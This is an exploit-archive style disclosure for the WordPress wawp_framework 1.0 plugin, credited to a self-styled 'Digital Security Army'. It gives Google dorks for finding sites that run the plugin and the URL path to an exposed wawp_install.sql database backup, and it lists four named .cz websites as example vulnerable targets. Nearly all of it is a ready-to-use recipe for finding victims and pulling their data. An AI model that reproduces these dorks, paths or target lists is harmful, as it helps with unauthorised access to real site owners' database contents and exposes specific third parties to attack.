WordPress wawp_framework 1.0 Database Backup

1. #################################################################################################
2.  
3. # Exploit Title : WordPress wawp_framework Plugins 1.0 Database Backup Information Disclosure Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 30/11/2018
6. # Vendor Homepages : wordpress.org ~ cryonix.cz ~ webarts.name
7. # Tested On : Windows and Linux
8. # Category : WebApps
9. # Version Information : 1.0
10. # Google Dorks : inurl:''/wp-content/plugins/wawp_framework/''
11. intext:''Hosted by Cryonix | Created by Webarts Studio'' site:cz
12. intext:''Created by Webarts Studio'' site:cz
13. # Exploit Risk : Medium
14. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
15. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
16. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
17.  
18. #################################################################################################
19.  
20. # Admin Panel Login Path :
21.  
22. /wp-login.php
23.  
24. # Exploit :
25.  
26. /wp-content/plugins/wawp_framework/wawp_install.sql
27.  
28. #################################################################################################
29.  
30. # Example Vulnerable Sites =>
31.  
32. [+] mp-izol.cz/wp-content/plugins/wawp_framework/wawp_install.sql
33.  
34. [+] cajovnapisek.cz/wp-content/plugins/wawp_framework/wawp_install.sql
35.  
36. [+] bubu7.cz/wp-content/plugins/wawp_framework/wawp_install.sql
37.  
38. [+] eduport.cz/wp-content/plugins/wawp_framework/wawp_install.sql
39.  
40. #################################################################################################
41.  
42. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
43.  
44. #################################################################################################